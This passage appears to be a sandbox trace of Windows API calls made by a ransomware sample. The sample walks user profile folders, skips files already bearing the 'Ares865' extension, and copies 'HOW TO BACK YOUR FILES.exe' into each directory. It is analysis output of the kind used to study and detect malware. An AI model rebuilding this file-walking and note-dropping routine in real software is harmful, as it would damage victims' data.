returned="Desktop.ini" [0042.460] lstrlenW (lpString="Desktop.ini") returned 11 [0042.460] lstrlenW (lpString="Ares865") returned 7 [0042.460] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.460] lstrcpyW (in: lpString1=0x2e2e932, lpString2="Garden.htm" | out: lpString1="Garden.htm") returned="Garden.htm" [0042.460] lstrlenW (lpString="Garden.htm") returned 10 [0042.460] lstrlenW (lpString="Ares865") returned 7 [0042.460] lstrcmpiW (lpString1="den.htm", lpString2="Ares865") returned 1 [0042.460] lstrcpyW (in: lpString1=0x2e2e932, lpString2="Garden.jpg" | out: lpString1="Garden.jpg") returned="Garden.jpg" [0042.460] lstrlenW (lpString="Garden.jpg") returned 10 [0042.460] lstrlenW (lpString="Ares865") returned 7 [0042.460] lstrcmpiW (lpString1="den.jpg", lpString2="Ares865") returned 1 [0042.460] lstrcpyW (in: lpString1=0x2e2e932, lpString2="Green Bubbles.htm" | out: lpString1="Green Bubbles.htm") returned="Green Bubbles.htm" [0042.460] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0042.460] lstrlenW (lpString="Ares865") returned 7 [0042.460] lstrcmpiW (lpString1="les.htm", lpString2="Ares865") returned 1 [0042.460] lstrcpyW (in: lpString1=0x2e2e932, lpString2="GreenBubbles.jpg" | out: lpString1="GreenBubbles.jpg") returned="GreenBubbles.jpg" [0042.461] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0042.461] lstrlenW (lpString="Ares865") returned 7 [0042.461] lstrcmpiW (lpString1="les.jpg", lpString2="Ares865") returned 1 [0042.461] lstrcpyW (in: lpString1=0x2e2e932, lpString2="Hand Prints.htm" | out: lpString1="Hand Prints.htm") returned="Hand Prints.htm" [0042.461] lstrlenW (lpString="Hand Prints.htm") returned 15 [0042.461] lstrlenW (lpString="Ares865") returned 7 [0042.461] lstrcmpiW (lpString1="nts.htm", lpString2="Ares865") returned 1 [0042.461] lstrcpyW (in: lpString1=0x2e2e932, lpString2="HandPrints.jpg" | out: lpString1="HandPrints.jpg") returned="HandPrints.jpg" [0042.461] lstrlenW (lpString="HandPrints.jpg") returned 14 [0042.461] lstrlenW (lpString="Ares865") returned 7 [0042.461] lstrcmpiW (lpString1="nts.jpg", lpString2="Ares865") returned 1 [0042.461] lstrcpyW (in: lpString1=0x2e2e932, lpString2="Orange Circles.htm" | out: lpString1="Orange Circles.htm") returned="Orange Circles.htm" [0042.461] lstrlenW (lpString="Orange Circles.htm") returned 18 [0042.461] lstrlenW (lpString="Ares865") returned 7 [0042.461] lstrcmpiW (lpString1="les.htm", lpString2="Ares865") returned 1 [0042.461] lstrcpyW (in: lpString1=0x2e2e932, lpString2="OrangeCircles.jpg" | out: lpString1="OrangeCircles.jpg") returned="OrangeCircles.jpg" [0042.461] lstrlenW (lpString="OrangeCircles.jpg") returned 17 [0042.461] lstrlenW (lpString="Ares865") returned 7 [0042.461] lstrcmpiW (lpString1="les.jpg", lpString2="Ares865") returned 1 [0042.461] lstrcpyW (in: lpString1=0x2e2e932, lpString2="Peacock.htm" | out: lpString1="Peacock.htm") returned="Peacock.htm" [0042.461] lstrlenW (lpString="Peacock.htm") returned 11 [0042.461] lstrlenW (lpString="Ares865") returned 7 [0042.461] lstrcmpiW (lpString1="ock.htm", lpString2="Ares865") returned 1 [0042.461] lstrcpyW (in: lpString1=0x2e2e932, lpString2="Peacock.jpg" | out: lpString1="Peacock.jpg") returned="Peacock.jpg" [0042.461] lstrlenW (lpString="Peacock.jpg") returned 11 [0042.462] lstrlenW (lpString="Ares865") returned 7 [0042.462] lstrcmpiW (lpString1="ock.jpg", lpString2="Ares865") returned 1 [0042.462] lstrcpyW (in: lpString1=0x2e2e932, lpString2="Roses.htm" | out: lpString1="Roses.htm") returned="Roses.htm" [0042.462] lstrlenW (lpString="Roses.htm") returned 9 [0042.462] lstrlenW (lpString="Ares865") returned 7 [0042.462] lstrcmpiW (lpString1="ses.htm", lpString2="Ares865") returned 1 [0042.462] lstrcpyW (in: lpString1=0x2e2e932, lpString2="Roses.jpg" | out: lpString1="Roses.jpg") returned="Roses.jpg" [0042.462] lstrlenW (lpString="Roses.jpg") returned 9 [0042.462] lstrlenW (lpString="Ares865") returned 7 [0042.462] lstrcmpiW (lpString1="ses.jpg", lpString2="Ares865") returned 1 [0042.462] lstrcpyW (in: lpString1=0x2e2e932, lpString2="Shades of Blue.htm" | out: lpString1="Shades of Blue.htm") returned="Shades of Blue.htm" [0042.462] lstrlenW (lpString="Shades of Blue.htm") returned 18 [0042.462] lstrlenW (lpString="Ares865") returned 7 [0042.462] lstrcmpiW (lpString1="lue.htm", lpString2="Ares865") returned 1 [0042.462] lstrcpyW (in: lpString1=0x2e2e932, lpString2="ShadesOfBlue.jpg" | out: lpString1="ShadesOfBlue.jpg") returned="ShadesOfBlue.jpg" [0042.462] lstrlenW (lpString="ShadesOfBlue.jpg") returned 16 [0042.462] lstrlenW (lpString="Ares865") returned 7 [0042.462] lstrcmpiW (lpString1="lue.jpg", lpString2="Ares865") returned 1 [0042.462] lstrcpyW (in: lpString1=0x2e2e932, lpString2="Soft Blue.htm" | out: lpString1="Soft Blue.htm") returned="Soft Blue.htm" [0042.462] lstrlenW (lpString="Soft Blue.htm") returned 13 [0042.462] lstrlenW (lpString="Ares865") returned 7 [0042.462] lstrcmpiW (lpString1="lue.htm", lpString2="Ares865") returned 1 [0042.462] lstrcpyW (in: lpString1=0x2e2e932, lpString2="SoftBlue.jpg" | out: lpString1="SoftBlue.jpg") returned="SoftBlue.jpg" [0042.462] lstrlenW (lpString="SoftBlue.jpg") returned 12 [0042.462] lstrlenW (lpString="Ares865") returned 7 [0042.463] lstrcmpiW (lpString1="lue.jpg", lpString2="Ares865") returned 1 [0042.463] lstrcpyW (in: lpString1=0x2e2e932, lpString2="Stars.htm" | out: lpString1="Stars.htm") returned="Stars.htm" [0042.463] lstrlenW (lpString="Stars.htm") returned 9 [0042.463] lstrlenW (lpString="Ares865") returned 7 [0042.463] lstrcmpiW (lpString1="ars.htm", lpString2="Ares865") returned 1 [0042.463] lstrcpyW (in: lpString1=0x2e2e932, lpString2="Stars.jpg" | out: lpString1="Stars.jpg") returned="Stars.jpg" [0042.463] lstrlenW (lpString="Stars.jpg") returned 9 [0042.463] lstrlenW (lpString="Ares865") returned 7 [0042.463] lstrcmpiW (lpString1="ars.jpg", lpString2="Ares865") returned 1 [0042.463] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0042.463] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0042.463] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0042.463] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned 100 [0042.463] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0042.463] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.463] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.464] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.464] GetLastError () returned 0x0 [0042.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.464] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.464] CloseHandle (hObject=0x118) returned 1 [0042.464] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.464] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.464] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.464] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.464] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.464] lstrcpyW (in: lpString1=0x2e2e92a, lpString2="new" | out: lpString1="new") returned="new" [0042.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0042.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd2) returned 0x2cbf48 [0042.464] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2428 | out: ListHead=0x2e77d0, ListEntry=0x2d2428) returned 0x2d2408 [0042.464] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8e6b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8e6b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="new", cAlternateFileName="")) returned 0 [0042.464] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.465] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2428 [0042.465] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0042.465] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbf48 | out: hHeap=0x2b0000) returned 1 [0042.465] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0042.465] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned 104 [0042.465] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0042.465] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.465] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\windows mail\\backup\\new\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.465] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.465] GetLastError () returned 0x0 [0042.465] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.465] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.465] CloseHandle (hObject=0x118) returned 1 [0042.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.466] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.466] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8e6b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8e6b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.466] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.466] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.466] lstrcpyW (in: lpString1=0x2e2e932, lpString2="edb00001.log" | out: lpString1="edb00001.log") returned="edb00001.log" [0042.466] lstrlenW (lpString="edb00001.log") returned 12 [0042.466] lstrlenW (lpString="Ares865") returned 7 [0042.466] lstrcmpiW (lpString1="001.log", lpString2="Ares865") returned -1 [0042.466] lstrcpyW (in: lpString1=0x2e2e932, lpString2="WindowsMail.MSMessageStore" | out: lpString1="WindowsMail.MSMessageStore") returned="WindowsMail.MSMessageStore" [0042.466] lstrlenW (lpString="WindowsMail.MSMessageStore") returned 26 [0042.466] lstrlenW (lpString="Ares865") returned 7 [0042.466] lstrcmpiW (lpString1="geStore", lpString2="Ares865") returned 1 [0042.466] lstrcpyW (in: lpString1=0x2e2e932, lpString2="WindowsMail.pat" | out: lpString1="WindowsMail.pat") returned="WindowsMail.pat" [0042.466] lstrlenW (lpString="WindowsMail.pat") returned 15 [0042.466] lstrlenW (lpString="Ares865") returned 7 [0042.466] lstrcmpiW (lpString1="ail.pat", lpString2="Ares865") returned -1 [0042.466] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player" [0042.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbe80 | out: hHeap=0x2b0000) returned 1 [0042.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0042.467] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player") returned 93 [0042.467] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player" [0042.467] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.467] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.467] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.467] GetLastError () returned 0x0 [0042.467] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.467] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.467] CloseHandle (hObject=0x118) returned 1 [0042.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.467] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.468] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.468] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.468] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.468] lstrcpyW (in: lpString1=0x2e2e91c, lpString2="CurrentDatabase_372.wmdb.Ares865" | out: lpString1="CurrentDatabase_372.wmdb.Ares865") returned="CurrentDatabase_372.wmdb.Ares865" [0042.468] lstrlenW (lpString="CurrentDatabase_372.wmdb.Ares865") returned 32 [0042.468] lstrlenW (lpString="Ares865") returned 7 [0042.468] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0042.468] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a90cce0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a90cce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.468] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.468] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x11370, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalMLS_3.wmdb.Ares865", cAlternateFileName="LOCALM~1.ARE")) returned 1 [0042.468] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.468] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2="aoldtz.exe") returned 1 [0042.468] lstrcpyW (in: lpString1=0x2e2e91c, lpString2="LocalMLS_3.wmdb.Ares865" | out: lpString1="LocalMLS_3.wmdb.Ares865") returned="LocalMLS_3.wmdb.Ares865" [0042.468] lstrlenW (lpString="LocalMLS_3.wmdb.Ares865") returned 23 [0042.468] lstrlenW (lpString="Ares865") returned 7 [0042.468] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0042.468] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 1 [0042.468] lstrcmpiW (lpString1="Sync Playlists", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.468] lstrcmpiW (lpString1="Sync Playlists", lpString2="aoldtz.exe") returned 1 [0042.468] lstrcpyW (in: lpString1=0x2e2e91c, lpString2="Sync Playlists" | out: lpString1="Sync Playlists") returned="Sync Playlists" [0042.468] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0042.468] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xda) returned 0x2cbe80 [0042.468] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0042.468] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 0 [0042.468] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.469] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2408 [0042.469] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0042.469] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbe80 | out: hHeap=0x2b0000) returned 1 [0042.469] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0042.469] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned 108 [0042.469] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0042.469] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.469] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.469] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.469] GetLastError () returned 0x0 [0042.469] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.469] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.470] CloseHandle (hObject=0x118) returned 1 [0042.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.470] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.470] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.470] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.470] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.470] lstrcpyW (in: lpString1=0x2e2e93a, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0042.470] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0042.470] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe6) returned 0x2cbe80 [0042.470] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0042.470] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: 